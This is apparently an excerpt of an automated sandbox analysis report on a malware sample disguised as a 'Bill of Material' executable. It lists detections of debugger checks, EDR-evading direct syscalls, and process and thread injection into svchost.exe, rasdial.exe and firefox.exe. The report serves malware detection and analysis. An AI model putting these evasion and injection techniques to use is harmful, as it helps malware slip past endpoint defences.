            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]2_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]2_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00390B62
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00362622
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0035083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0035083F
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003509D5 SetUnhandledExceptionFilter,0_2_003509D5
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00350C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 5952Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D36008Jump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00372BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00372BA5
